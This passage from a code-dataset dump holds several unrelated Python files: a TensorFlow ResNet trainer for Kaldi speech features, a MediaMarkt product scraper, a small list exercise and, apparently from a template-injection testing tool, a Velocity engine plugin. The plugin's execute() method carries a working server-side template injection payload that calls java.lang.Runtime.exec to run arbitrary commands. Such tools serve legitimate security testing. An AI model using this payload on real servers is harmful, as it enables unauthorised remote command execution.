This is implemented by passing\n # reuse=True to the variable scopes of train graph\n logits = inference(self.input_placeholder, FLAGS.num_residual_blocks, #self.reuse_placeholder,\n self.is_training_placeholder)\n #vali_logits = inference(self.vali_input_placeholder, FLAGS.num_residual_blocks, reuse=True, is_training=False)\n\n # The following codes calculate the train loss, which is consist of the\n # softmax cross entropy and the relularization loss\n #regu_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)\n loss = self.loss(logits, self.label_placeholder)\n #self.full_loss = tf.add_n([loss] + regu_losses)\n self.full_loss = loss\n\n predictions = tf.nn.softmax(logits)\n self.train_top1_error = self.top_k_error(predictions, self.label_placeholder, 1)\n\n # Validation loss\n #self.vali_loss = self.loss(vali_logits, self.vali_label_placeholder)\n self.vali_loss = loss\n #vali_predictions = tf.nn.softmax(vali_logits)\n #self.vali_top1_error = self.top_k_error(vali_predictions, self.vali_label_placeholder, 1)\n self.vali_top1_error = self.top_k_error(predictions, self.label_placeholder, 1)\n\n self.train_op, self.train_ema_op = self.train_operation(global_step, self.full_loss,\n self.train_top1_error)\n #self.val_op = self.validation_op(validation_step, self.vali_top1_error, self.vali_loss)\n\n def train(self):\n '''\n This is the main function for training\n '''\n\n # For the first step, we are loading all training images and validation images into the\n # memory\n # all_data, all_labels = prepare_train_data(padding_size=FLAGS.padding_size)\n # vali_data, vali_labels = read_validation_data()\n\n # create a feature reader\n featdir = FLAGS.featdir\n aligdir = FLAGS.aligdir\n\n featreader = kaldiIO.TableReader(featdir + '/feats_delta_5fr_sp_bi.scp')\n lablreader = kaldiIO.LabelReader(aligdir + '/labels.scp')\n uid_list_lab = lablreader.get_uid_list()\n featreader.remove_lab_difference(uid_list_lab)\n # get the shuffled order of the feat list, and shuffle the lable list with the order\n scp_order = featreader.get_scp_order()\n lablreader.shuffle_utt(scp_order)\n\n vali_featdir = FLAGS.vali_featdir\n vali_aligdir = FLAGS.vali_aligdir\n\n vali_featreader = kaldiIO.TableReader(vali_featdir + '/feats_delta_5fr_sp_bi.scp', False)\n vali_lablreader = kaldiIO.LabelReader(vali_aligdir + '/labels.scp')\n\n vali_uid_list_feat = vali_featreader.get_uid_list()\n vali_lablreader.remove_utt_difference(vali_uid_list_feat)\n\n vali_uid_list_labl = vali_lablreader.get_uid_list()\n vali_featreader.remove_lab_difference(vali_uid_list_labl)\n\n vali_scp_order = vali_featreader.get_scp_order()\n vali_lablreader.shuffle_utt(vali_scp_order)\n # create a target coder\n # xsr6064 coder = target_coder.AlignmentCoder(lambda x, y: x, num_labels)\n\n dispenser = batchdispenser.BatchDispenser(featreader, lablreader, int(FLAGS.bulk_size),\n int(FLAGS.train_batch_size), FLAGS.train_shuffle_flag)\n vali_dispenser = batchdispenser.BatchDispenser(vali_featreader, vali_lablreader, int(FLAGS.bulk_size),\n int(FLAGS.validation_batch_size), FLAGS.valid_shuffle_flag)\n\n # Build the graph for train and validation\n self.build_train_validation_graph()\n\n # Initialize a saver to save checkpoints. Merge all summaries, so we can run all\n # summarizing operations by running summary_op. 
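The comment above describes the classic TF1 idiom for sharing weights between a train graph and a validation graph: re-enter the same variable scope with `reuse=True` (this file instead routes both phases through one graph plus an `is_training` placeholder). A sketch of the idiom itself, assuming TensorFlow 1.x as used throughout the file:

```python
import tensorflow as tf  # assumes TensorFlow 1.x, matching the file above


def dense(x, reuse):
    with tf.variable_scope("layer", reuse=reuse):
        w = tf.get_variable("w", shape=[4, 2])
        return tf.matmul(x, w)


train_in = tf.placeholder(tf.float32, [None, 4])
vali_in = tf.placeholder(tf.float32, [None, 4])

train_logits = dense(train_in, reuse=False)  # creates layer/w
vali_logits = dense(vali_in, reuse=True)     # reuses the same layer/w
```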
Initialize a new session\n saver = tf.train.Saver(tf.global_variables())\n #summary_op = tf.summary.merge_all()\n init = tf.initialize_all_variables()\n sess = tf.Session()\n\n # If you want to load from a checkpoint\n if FLAGS.is_use_ckpt is True:\n print ('Restoring from checkpoint... {}'.format(FLAGS.ckpt_path))\n saver.restore(sess, FLAGS.ckpt_path)\n print ('Restored model ...')\n else:\n sess.run(init)\n\n # This summary writer object helps write summaries on tensorboard\n #summary_writer = tf.summary.FileWriter(FLAGS.train_dir + '/log', sess.graph)\n\n # These lists are used to save a csv file at last\n #step_list = []\n #train_error_list = []\n #val_error_list = []\n\n print ('Start training...')\n print ('----------------------------')\n\n best_model = 0 #--------------------------\n\n #validation_loss_value, validation_error_value = self.full_validation(loss=self.vali_loss,\n # top1_error=self.vali_top1_error,\n # vali_dispenser=vali_dispenser,\n # session=sess)\n # #batch_data=train_batch_data,\n # #batch_label=train_batch_labels\n #vali_featreader.reset()\n #vali_lablreader.reset(vali_featreader.get_scp_order())\n #vali_dispenser.reset()\n validation_loss_value = 10000\n validation_error_value = 10000\n\n #_, _, _ = vali_dispenser.get_batch()\n print (\"Starting Validation Loss: {} | Staring Validation Error: {}\".format(validation_loss_value, validation_error_value))\n print ('------------------------------------------------------------')\n print('\\n')\n\n lr = FLAGS.init_lr_res\n half_lr = 0 #--------------------------------------------\n #stop_training = False\n\n for epoch in range(0, FLAGS.train_epoch): #---------------------------------\n end_epoch = False\n start_time = time.time()\n\n # Training\n iter = 0\n #for x in range(100):\n print ('Start training Epoch {}'.format(epoch))\n print ('The Learning rate of the epoch is: {}'.format(lr))\n while not end_epoch:\n train_batch_data, train_batch_labels, end_epoch = dispenser.get_batch()\n if train_batch_data == []:\n continue\n train_batch_data = np.array(self.stack_batch(train_batch_data))\n assert (train_batch_data.shape == (int(FLAGS.train_batch_size), 40, 11, 3))\n\n _, _, train_loss_value, train_error_value = sess.run([self.train_op, self.train_ema_op,\n self.full_loss, self.train_top1_error],\n {self.input_placeholder: train_batch_data,\n self.label_placeholder: train_batch_labels,\n #self.vali_input_placeholder: validation_batch_data,\n #self.vali_label_placeholder: validation_batch_labels,\n #self.reuse_placeholder: False,\n self.is_training_placeholder: True,\n self.lr_placeholder: lr}\n )\n #train_error_list.append(train_error_value)\n print(\"Epoch {}, Iter {}: training loss: {}, training error: {}\".format(epoch, iter, train_loss_value, train_error_value))\n iter = iter + 1\n if math.isnan(train_loss_value):\n break\n duration = time.time() - start_time\n featreader.reset()\n lablreader.reset(featreader.get_scp_order())\n dispenser.reset()\n print (\"Time spend for epoch {}: {}\".format(epoch, str(datetime.timedelta(seconds=duration))))\n print ('\\n')\n\n # Check the validation\n # loss first\n if not math.isnan(train_loss_value):\n print ('Strat Validation ...')\n validation_loss_value_new, validation_error_value_new = self.full_validation(loss=self.vali_loss,\n top1_error=self.vali_top1_error,\n vali_dispenser=vali_dispenser,\n #vali_labels=vali_labels,\n session=sess\n #batch_data=train_batch_data,\n #batch_label=train_batch_labels\n )\n vali_featreader.reset()\n 
vali_lablreader.reset(vali_featreader.get_scp_order())\n vali_dispenser.reset()\n else:\n validation_loss_value_new = 10000\n validation_error_value_new = 10000\n\n print (\"Validation Loss: {} | Validation Error: {}\".format(validation_loss_value_new,\n validation_error_value_new))\n\n #vali_summ = tf.Summary()\n #vali_summ.value.add(tag='full_validation_error',\n # simple_value=validation_error_value.astype(np.float))\n #summary_writer.add_summary(vali_summ, epoch)\n #summary_writer.flush()\n\n #val_error_list.append(validation_error_value)\n\n #train_batch_data, train_batch_labels, _ = dispenser.get_batch()\n #train_batch_data = np.array(self.stack_batch(train_batch_data))\n\n #validation_batch_data, validation_batch_labels, _ = vali_dispenser.get_batch()\n #validation_batch_data = np.array(self.stack_batch(validation_batch_data))\n\n #summary_str = sess.run(summary_op, {self.input_placeholder: train_batch_data,\n # self.label_placeholder: train_batch_labels,\n #self.vali_input_placeholder: validation_batch_data,\n #self.vali_label_placeholder: validation_batch_labels,\n # self.lr_placeholder: lr})\n #summary_writer.add_summary(summary_str, epoch)\n\n print ('Validation top1 error = %.4f' % validation_error_value_new)\n print ('Validation loss = ', validation_loss_value_new)\n print ('----------------------------')\n\n #step_list.append(epoch)\n\n validation_loss_value_pre = validation_loss_value\n\n if validation_loss_value_new < validation_loss_value:\n validation_loss_value = validation_loss_value_new\n best_model = epoch\n checkpoint_path = os.path.join(FLAGS.train_dir, 'model.ckpt')\n else:\n checkpoint_path = os.path.join(FLAGS.train_dir, 'model.ckpt_reject')\n\n # Save checkpoints every epoch\n saver.save(sess, checkpoint_path, global_step=epoch)\n # save the training error to csv files\n #df = pd.DataFrame(data={'train_error': train_error_list})\n #df.to_csv(FLAGS.train_dir + '/' + str(epoch) + '_train_error.csv')\n\n if validation_loss_value_pre != validation_loss_value and \\\n (validation_loss_value_pre - validation_loss_value) / validation_loss_value_pre \\\n < FLAGS.stop_training_bar and \\\n lr != FLAGS.init_lr_res:\n print (\"(Vali_loss_pre - Vali_loss) / Vali_loss_pre: ({} - {}) / {} = {}\".format(validation_loss_value_pre,\n validation_loss_value, validation_loss_value_pre, (validation_loss_value_pre -\n validation_loss_value) / validation_loss_value_pre))\n print ('Stop training: Validation Loss decrease is too small')\n break\n if (validation_loss_value_pre - validation_loss_value) / validation_loss_value_pre \\\n < FLAGS.halving_lr_bar:\n half_lr = 1\n if half_lr == 1:\n lr = FLAGS.lr_decay_factor * lr\n print (\"(Vali_loss_pre - Vali_loss) / Vali_loss_pre: ({} - {}) / {} = {}\".format(validation_loss_value_pre,\n validation_loss_value, validation_loss_value_pre, (validation_loss_value_pre -\n validation_loss_value) / validation_loss_value_pre))\n print ('Learning rate decayed to ', lr) \n print ('------------------------------------------')\n print ('\\n')\n\n if best_model != epoch:\n ckpt_path = os.path.join(FLAGS.train_dir, 'model.ckpt-' + str(best_model))\n print ('Restoring from checkpoint: {}'.format(ckpt_path))\n saver.restore(sess, ckpt_path)\n print ('Restored from checkpoint ...')\n\n #df = pd.DataFrame(data={'epoch': step_list, 'validation_error': val_error_list})\n #df.to_csv(FLAGS.train_dir + '/' + str(epoch) + '_validation_error.csv')\n\n print ('Done training...')\n print ('----------------------------')\n\n\n def test(self):\n '''\n :return: the 
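The epoch loop above implements a newbob-style schedule: once the relative validation-loss improvement falls below `halving_lr_bar`, the learning rate decays every subsequent epoch, and training stops when the improvement drops below the stricter `stop_training_bar`. The rate-update rule stripped of the TF plumbing (threshold and decay values here are illustrative):

```python
def next_lr(lr, prev_loss, loss, halving_started, halving_bar=0.01, decay=0.5):
    """Return (new_lr, halving_started) for one epoch transition."""
    improvement = (prev_loss - loss) / prev_loss
    if improvement < halving_bar:
        halving_started = True      # latch: once halving starts, it continues
    if halving_started:
        lr *= decay
    return lr, halving_started


lr, halving = 0.1, False
for prev, cur in [(10.0, 8.0), (8.0, 7.95), (7.95, 7.9)]:
    lr, halving = next_lr(lr, prev, cur, halving)
    print(lr)   # 0.1, then 0.05, then 0.025
```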
softmax probability with shape [num_test_images, num_labels]\n '''\n\n test_featdir = FLAGS.test_featdir\n #test_aligdir = FLAGS.aligdir\n\n test_featreader = kaldiIO.TableReader(test_featdir + '/feats_delta_5fr_sp_bi.scp')\n test_lablreader = None\n #test_lablreader = kaldiIO.LabelReader(aligdir + '/labels.scp')\n #uid_list_lab = test_lablreader.get_uid_list()\n #test_featreader.remove_lab_difference(uid_list_lab)\n # get the shuffled order of the feat list, and shuffle the lable list with the order\n #scp_order = test_featreader.get_scp_order()\n #test_lablreader.shuffle_utt(scp_order)\n\n dispenser = batchdispenser.TestBatchDispenser(test_featreader, FLAGS.test_labels, \n test_lablreader, int(FLAGS.test_batch_size))\n\n # Create the test image and labels placeholders\n self.test_input_placeholder = tf.placeholder(dtype=tf.float32, shape=[FLAGS.test_batch_size,\n INPUT_HEIGHT, INPUT_WIDTH, INPUT_DEPTH])\n\n # Build the test graph\n logits = inference(self.test_input_placeholder, FLAGS.num_residual_blocks, \n self.is_training_placeholder)\n #use_softmax = FLAGS.test_use_softmax\n #if use_softmax:\n # logits = tf.nn.softmax(logits)\n\n # Initialize a new session and restore a checkpoint\n saver = tf.train.Saver(tf.all_variables())\n sess = tf.Session()\n\n saver.restore(sess, FLAGS.test_ckpt_path)\n print ('Model restored from ', FLAGS.test_ckpt_path)\n\n total_logits_array = []\n uids = []\n # Test by batches\n #zero_batch = np.zeros((128, 40, 11, 3))\n #zero_logit_array = sess.run(logits, feed_dict={self.test_input_placeholder: zero_batch,\n # self.is_training_placeholder: False})\n #print (\"zero_logit: {}\".format(zero_logit_array))\n #print (\"zero_logit_shape: {}\".format(zero_logit_array.shape))\n #zero_pred = zero_logit_array[0]\n #print (zero_pred.shape)\n #print (\"!!!!!!!!!!!!!!!!!!!!!!!!!!\")\n count = 0\n for i in range(dispenser.num_utt()):\n utt_logits_array = np.array([]).reshape(-1, NUM_CLASS)\n num_frames, utt_id = dispenser.fetch_utt()\n num_batches = dispenser.num_batches()\n for step in range(num_batches):\n test_batch, _, _ = dispenser.get_batch()\n test_batch = np.array(self.stack_batch(test_batch))\n #print (\"batch {}: {}\".format(step, test_batch))\n #print (50 * \"=\")\n batch_logits_array = sess.run(logits,\n feed_dict={self.test_input_placeholder: test_batch,\n self.is_training_placeholder: False})\n\n utt_logits_array = np.concatenate((utt_logits_array, batch_logits_array))\n print (\"{}th utterance: {} -----------\".format(i, utt_id))\n print (\"num_frame: {}\".format(num_frames))\n print (\"utt_logits length: {}\".format(utt_logits_array.shape[0]))\n print (\"num_zeros_frames: {}\".format(utt_logits_array[num_frames:].shape))\n #print (utt_logits_array)\n #print (50 * \"-\")\n #print (utt_logits_array[num_frames:])\n\n #for i in range(utt_logits_array[num_frames:].shape[0]):\n # if not np.array_equal(zero_pred, utt_logits_array[num_frames:][i]):\n # print (\"@@@@@@@@@@@@@@@@@@@@@@@@@\")\n\n utt_logits_array = utt_logits_array[:num_frames]\n print (\"num_nonzeros_frames: {}\".format(utt_logits_array.shape))\n uids.append(utt_id)\n total_logits_array.append(utt_logits_array)\n\n print (\"num_utt: {}, {}\".format(len(uids), len(total_logits_array)))\n\n with kaldiIO.TableWriter(FLAGS.test_dir + '/test_pred.scp', FLAGS.test_dir + '/test_pred.ark') as pred_writer:\n for uid, logits in zip(uids, total_logits_array):\n pred_writer.write(str(uid), logits)\n print (\"---- Done testing ----\")\n\n\n\n ## Helper functions\n def loss(self, logits, labels):\n '''\n 
Calculate the cross entropy loss given logits and true labels\n :param logits: 2D tensor with shape [batch_size, num_labels]\n :param labels: 1D tensor with shape [batch_size]\n :return: loss tensor with shape [1]\n '''\n labels = tf.cast(labels, tf.int64)\n cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits,\n labels=labels, name='cross_entropy_per_example')\n cross_entropy_mean = tf.reduce_mean(cross_entropy, name='cross_entropy')\n return cross_entropy_mean\n\n def top_k_error(self, predictions, labels, k):\n '''\n Calculate the top-k error\n :param predictions: 2D tensor with shape [batch_size, num_labels]\n :param labels: 1D tensor with shape [batch_size, 1]\n :param k: int\n :return: tensor with shape [1]\n '''\n batch_size = predictions.get_shape().as_list()[0]\n in_top1 = tf.to_float(tf.nn.in_top_k(predictions, labels, k=1))\n num_correct = tf.reduce_sum(in_top1)\n return (batch_size - num_correct) / float(batch_size)\n\n def generate_vali_batch(self, vali_data, vali_label, vali_batch_size):\n '''\n If you want to use a random batch of validation data to validate instead of using the\n whole validation data, this function helps you generate that batch\n :param vali_data: 4D numpy array\n :param vali_label: 1D numpy array\n :param vali_batch_size: int\n :return: 4D numpy array and 1D numpy array\n '''\n offset = np.random.choice(10000 - vali_batch_size, 1)[0]\n vali_data_batch = vali_data[offset:offset + vali_batch_size, ...]\n vali_label_batch = vali_label[offset:offset + vali_batch_size]\n return vali_data_batch, vali_label_batch\n\n def train_operation(self, global_step, total_loss, top1_error):\n '''\n Defines train operations\n :param global_step: tensor variable with shape [1]\n :param total_loss: tensor with shape [1]\n :param top1_error: tensor with shape [1]\n :return: two operations. Running train_op will do optimization once. Running train_ema_op\n will generate the moving average of train error and train loss for tensorboard\n '''\n # Add train_loss, current learning rate and train error into the tensorboard summary ops\n #tf.summary.scalar('learning_rate', self.lr_placeholder)\n #tf.summary.scalar('train_loss', total_loss)\n #tf.summary.scalar('train_top1_error', top1_error)\n\n # The ema object help calculate the moving average of train loss and train error\n ema = tf.train.ExponentialMovingAverage(FLAGS.train_ema_decay, global_step)\n train_ema_op = ema.apply([total_loss, top1_error])\n #tf.summary.scalar('train_top1_error_avg', ema.average(top1_error))\n #tf.summary.scalar('train_loss_avg', ema.average(total_loss))\n\n #opt = tf.train.MomentumOptimizer(learning_rate=self.lr_placeholder, momentum=0.9)\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n opt = tf.train.AdamOptimizer(learning_rate=self.lr_placeholder)\n train_op = opt.minimize(total_loss, global_step=global_step)\n return train_op, train_ema_op\n\n def validation_op(self, validation_step, top1_error, loss):\n '''\n Defines validation operations\n :param validation_step: tensor with shape [1]\n :param top1_error: tensor with shape [1]\n :param loss: tensor with shape [1]\n :return: validation operation\n '''\n\n # This ema object help calculate the moving average of validation loss and error\n\n # ema with decay = 0.0 won't average things at all. 
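Note that `top_k_error` above accepts a parameter `k` yet passes `k=1` to `tf.nn.in_top_k`, so it always reports top-1 error regardless of the argument. A framework-free NumPy version that honors `k`:

```python
import numpy as np


def top_k_error(predictions, labels, k):
    """predictions: (batch, num_labels) scores; labels: (batch,) int ids."""
    # indices of the k highest-scoring classes per row
    top_k = np.argsort(predictions, axis=1)[:, -k:]
    correct = sum(label in row for label, row in zip(labels, top_k))
    return (len(labels) - correct) / float(len(labels))


preds = np.array([[0.1, 0.7, 0.2], [0.5, 0.3, 0.2]])
print(top_k_error(preds, np.array([2, 1]), k=1))  # 1.0: both rows miss at top-1
print(top_k_error(preds, np.array([2, 1]), k=2))  # 0.0: both hit within top-2
```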
This returns the original error\n ema = tf.train.ExponentialMovingAverage(0.0, validation_step)\n ema2 = tf.train.ExponentialMovingAverage(0.95, validation_step)\n\n val_op = tf.group(validation_step.assign_add(1), ema.apply([top1_error, loss]),\n ema2.apply([top1_error, loss]))\n top1_error_val = ema.average(top1_error)\n top1_error_avg = ema2.average(top1_error)\n loss_val = ema.average(loss)\n loss_val_avg = ema2.average(loss)\n\n # Summarize these values on tensorboard\n #tf.summary.scalar('val_top1_error', top1_error_val)\n #tf.summary.scalar('val_top1_error_avg', top1_error_avg)\n #tf.summary.scalar('val_loss', loss_val)\n #tf.summary.scalar('val_loss_avg', loss_val_avg)\n return val_op\n\n def full_validation(self, loss, top1_error, vali_dispenser, session):\n '''\n Runs validation on all the 10000 valdiation images\n :param loss: tensor with shape [1]\n :param top1_error: tensor with shape [1]\n :param session: the current tensorflow session\n :param vali_data: 4D numpy array\n :param vali_labels: 1D numpy array\n :param batch_data: 4D numpy array. training batch to feed dict and fetch the weights\n :param batch_label: 1D numpy array. training labels to feed the dict\n :return: float, float\n '''\n #num_batches = 10000 // FLAGS.validation_batch_size\n #order = np.random.choice(10000, num_batches * FLAGS.validation_batch_size)\n #vali_data_subset = vali_data[order, ...]\n #vali_labels_subset = vali_labels[order]\n\n loss_list = []\n error_list = []\n\n end_vali_set = False\n #for x in range(100):\n count = 0\n while not end_vali_set:\n count += 1\n vali_feat_batch, vali_labl_batch, end_vali_set = vali_dispenser.get_batch()\n if vali_feat_batch == []:\n continue\n vali_feat_batch = np.array(self.stack_batch(vali_feat_batch))\n #print (vali_feat_batch.shape)\n #print ([int(FLAGS.validation_batch_size), INPUT_HEIGHT, INPUT_WIDTH, INPUT_DEPTH])\n assert (vali_feat_batch.shape == (int(FLAGS.validation_batch_size), INPUT_HEIGHT, INPUT_WIDTH, INPUT_DEPTH))\n\n #offset = step * FLAGS.validation_batch_size\n feed_dict = {#self.input_placeholder: batch_data, self.label_placeholder: batch_label,\n self.input_placeholder: vali_feat_batch,\n self.label_placeholder: vali_labl_batch,\n #self.reuse_placeholder: True,\n self.is_training_placeholder: False}\n loss_value, top1_error_value = session.run([loss, top1_error], feed_dict=feed_dict)\n loss_list.append(loss_value)\n error_list.append(top1_error_value)\n print ('Iter {} - Validation Batch Loss: {} | Validation Batch Error: {}'.format(count, loss_value, top1_error_value))\n\n return np.mean(loss_list), np.mean(error_list)\n\n def stack_batch(self, input):\n new_batch = []\n num_frames = input.shape[0]\n for i in range(num_frames):\n new_batch.append(self.reshape_frame(input[i], INPUT_HEIGHT, INPUT_DEPTH))\n return np.array(new_batch)\n\n def reshape_frame(self, frame, width, num_slice):\n res = [[] for _ in range(width)]\n len = frame.shape[0] \n stride = width * num_slice\n height = int(len / stride)\n for i in range(height):\n tmp = frame[i * stride: (i + 1) * stride]\n for j in range(width):\n tup = []\n for k in range(num_slice):\n tup.append(tmp[k * width + j])\n res[j].append(tup)\n return np.array(res)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--mode', choices=('train', 'test'), help='the mode to run the code')\n args = parser.parse_args()\n train = Train()\n if args.mode == 'train':\n # Initialize the Train object\n # Start the training session\n train.train()\n else:\n 
train.test()\n","sub_path":"resnet/resnet_1_train.py","file_name":"resnet_1_train.py","file_ext":"py","file_size_in_byte":28519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"518990636","text":"from utils.loggers import log\nfrom core.plugin import Plugin\nfrom core import closures\nfrom utils import rand\nfrom utils.strings import quote\n\nclass Velocity(Plugin):\n\n render_fmt = '#set($p=%(payload)s)\\n${p}\\n'\n header_fmt = '\\n#set($h=%(header)s)\\n${h}\\n'\n trailer_fmt = '\\n#set($t=%(trailer)s)\\n${t}'\n contexts = [\n { 'level': 1, 'prefix': '%(closure)s)', 'suffix' : '', 'closures' : closures.java_ctx_closures },\n \n # This catches \n # #if(%s == 1)\\n#end \n # #foreach($item in %s)\\n#end\n # #define( %s )a#end\n { 'level': 3, 'prefix': '%(closure)s#end#if(1==1)', 'suffix' : '', 'closures' : closures.java_ctx_closures },\n { 'level': 5, 'prefix': '*#', 'suffix' : '#*' },\n\n ]\n \n def detect_engine(self):\n\n expected_rand = str(rand.randint_n(1))\n payload = '#set($p=%(payload)s)\\n$p\\n' % ({ 'payload': expected_rand })\n\n if expected_rand == self.inject(payload):\n self.set('language', 'java')\n self.set('engine', 'velocity')\n\n def detect_exec(self):\n\n expected_rand = str(rand.randint_n(2))\n\n if expected_rand == self.execute('echo %s' % expected_rand):\n self.set('exec', True)\n self.set('os', self.execute(\"uname\"))\n\n def execute(self, command):\n\n # I've tested the techniques described in this article\n # http://blog.portswigger.net/2015/08/server-side-template-injection.html\n # for it didn't work. Still keeping the check active to cover previous\n # affected versions.\n\n return self.inject(\"\"\"#set($str=$class.inspect(\"java.lang.String\").type)\n#set($chr=$class.inspect(\"java.lang.Character\").type)\n#set($ex=$class.inspect(\"java.lang.Runtime\").type.getRuntime().exec(\"%s\"))\n$ex.waitFor()\n#set($out=$ex.getInputStream())\n#foreach($i in [1..$out.available()])\n$str.valueOf($chr.toChars($out.read()))\n#end\"\"\" % (quote(command)))\n","sub_path":"plugins/engines/velocity.py","file_name":"velocity.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"249152624","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jan 9 16:46:58 2021\r\n\r\n@author: ANIL\r\n\"\"\"\r\n\r\n\r\ndef show_messages(messages):\r\n sent_msg = []\r\n while messages:\r\n message = messages.pop()\r\n print(message)\r\n sent_msg.insert(0, message)\r\n\r\n return sent_msg\r\n\r\n\r\nmessages = ['Delhi is capital of India', 'Indian cricket team captain is Virat',\r\n 'Amitabh is film actor.']\r\nmsgs = show_messages(messages[:])\r\nprint(messages)\r\nprint(msgs)\r\n","sub_path":"Python Crash Course/vAnil/Chapter-8/8-11.py","file_name":"8-11.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"254638620","text":"from .SourceWebSite import SourceWebSite\n\n\nclass MediaMarktTR(SourceWebSite):\n base_url = \"https://www.mediamarkt.com.tr\"\n source_name = 'MediaMarktTR'\n\n def get_results(self, url):\n content = self.get_content(url['url'])\n\n if content and content.find(\"ul\", \"products-list\"):\n page_number = int(\n content.find(\"ul\", \"pagination\").find_all(\"li\")[-2].text if content.find(\"ul\", \"pagination\") else '1')\n page_number = self.max_page if page_number > self.max_page else page_number\n\n self.results += 
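`stack_batch`/`reshape_frame` above rebuild each flat feature frame into a `(width, height, num_slice)` array with three nested loops. The identical layout falls out of one reshape plus a transpose, since `res[j, i, k] == frame[i*width*num_slice + k*width + j]`:

```python
import numpy as np


def reshape_frame(frame, width, num_slice):
    """Vectorized equivalent of the loop version above."""
    height = frame.shape[0] // (width * num_slice)
    # reshape gives arr[i, k, j]; transpose reorders to res[j, i, k]
    return frame.reshape(height, num_slice, width).transpose(2, 0, 1)


frame = np.arange(40 * 11 * 3)               # one flattened input frame
print(reshape_frame(frame, 40, 3).shape)     # (40, 11, 3), the model's input shape
```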
self.get_products(content, url['search'])\n if page_number > 1:\n page_list = [url['url'] + '&page=' + str(number) for number in range(2, page_number)]\n contents = self.get_contents(page_list)\n for content in contents:\n self.results += self.get_products(content, url['search'])\n else:\n pass\n elif content and content.find(\"div\", id=\"product-details\"):\n self.results += self.get_product(content, url['search'])\n else:\n pass\n\n @staticmethod\n def get_categories():\n categories = {\n 'All': 'query={search2}&searchProfile=onlineshop&channel=mmtrtr',\n 'Notebooks': 'searchParams=%2FSearch.ff%3Fquery%3D{search1}%26filterTabbedCategory%3Donlineshop%26filteravailability%3D1%26filterCategoriesROOT%3DBilgisayar%25C2%25A7MediaTRtrc504925%26filterCategoriesROOT%252FBilgisayar%25C2%25A7MediaTRtrc504925%3DTa%25C5%259F%25C4%25B1nabilir%2BBilgisayarlar%25C2%25A7MediaTRtrc504926%26channel%3Dmmtrtr%26productsPerPage%3D20%26disableTabbedCategory%3Dtrue&searchProfile=onlineshop&query={search2}&sort=price&page=&sourceRef=INVALID',\n 'Smartphones': 'searchParams=%2FSearch.ff%3Fquery%3D{search1}%26filterTabbedCategory%3Donlineshop%26filteravailability%3D1%26filterCategoriesROOT%3DTelefon%25C2%25A7MediaTRtrc465595%26filterCategoriesROOT%252FTelefon%25C2%25A7MediaTRtrc465595%3DCep%2BTelefonlar%25C4%25B1%25C2%25A7MediaTRtrc504171%26channel%3Dmmtrtr%26productsPerPage%3D20%26disableTabbedCategory%3Dtrue&searchProfile=onlineshop&query={search2}&sort=price&sourceRef=INVALID',\n 'Monitors': 'searchParams=/Search.ff?query%3D{search1}%26filterTabbedCategory%3Donlineshop%26filteravailability%3D1%26filterCategoriesROOT%3DBilgisayar%2BBile%25C5%259Fenleri%25C2%25A7MediaTRtrc639556%26filterCategoriesROOT%252FBilgisayar%2BBile%25C5%259Fenleri%25C2%25A7MediaTRtrc639556%3DMonit%25C3%25B6r%25C2%25A7MediaTRtrc639581%26channel%3Dmmtrtr%26productsPerPage%3D20%26disableTabbedCategory%3Dtrue&searchProfile=onlineshop&query={search2}&sort=price&sourceRef=INVALID',\n }\n return categories\n\n @staticmethod\n def create_url(search, category):\n category = category.format(search1='%2B'.join(search.split()), search2='+'.join(search.split()))\n url = 'https://www.mediamarkt.com.tr/tr/search.html?{}'.format(category)\n return url\n\n def get_product(self, product, search):\n products = []\n\n product_name = product.find(\"h1\", {'itemprop': 'name'}).text.strip()\n if product.find(\"meta\", {'itemprop': 'price'}):\n product_price = product.find(\"meta\", {'itemprop': 'price'})['content'].split('.')[0] + ' TL'\n else:\n return products\n product_price_from = ''\n product_info = 'Ücretsiz Kargo' if product.find(\"span\", {\"data-layer\": \"deliveryinformation\"}) else ''\n product_comment_count = product.find(\"div\", \"rating\").findNext('span').text.strip() if product.find(\"div\",\n \"rating\") else ''\n suitable_to_search = self.is_suitable_to_search(product_name, search)\n products.append(\n {'source': '[{}]'.format(self.source_name), 'name': product_name, 'code': None, 'price': product_price,\n 'old_price': product_price_from, 'info': product_info, 'comment_count': product_comment_count,\n 'suitable_to_search': suitable_to_search})\n # print(product_name,product_price,product_info,product_comment_count)\n\n return products\n\n def get_products(self, content, search):\n products = []\n\n for product in content.find(\"ul\", class_=\"products-list\").find_all(\"li\", recursive=False):\n if product.has_attr('class'):\n continue\n product_name = product.find(\"h2\").text.strip()\n if product.find(\"div\", class_='price small'):\n 
product_price = product.find(\"div\", class_='price small').text.split(',')[0] + ' TL'\n else:\n continue\n product_price_from = product.find(\"div\", class_='price price-xs price-old').text.split(',')[\n 0] + ' TL' if product.find(\"div\", class_='price price-xs price-old') else '1'\n product_info = ' '.join(\n product.find(\"span\", {\"data-layer\": \"deliveryinformation\"}).parent.text.split()) if product.find(\"span\",\n {\n \"data-layer\": \"deliveryinformation\"}) else ''\n product_comment_count = product.find(\"div\", \"rating\").findNext('a').text.strip() if product.find(\"div\",\n \"rating\") else ''\n suitable_to_search = self.is_suitable_to_search(product_name, search)\n products.append(\n {'source': '[{}]'.format(self.source_name), 'name': product_name, 'code': None, 'price': product_price,\n 'old_price': product_price_from, 'info': product_info,\n 'comment_count': product_comment_count, 'suitable_to_search': suitable_to_search})\n # print(product_name,product_price,product_info,product_comment_count)\n return products\n","sub_path":"QuickSearch/websites/MediaMarktTR.py","file_name":"MediaMarktTR.py","file_ext":"py","file_size_in_byte":6118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"178310514","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2015, Frappe Technologies and contributors\n# For license information, please see license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe.model.document import Document\nfrom frappe import _\nfrom erpnext.schools.utils import validate_duplicate_student\nfrom erpnext.schools.api import get_student_batch_students\n\nclass 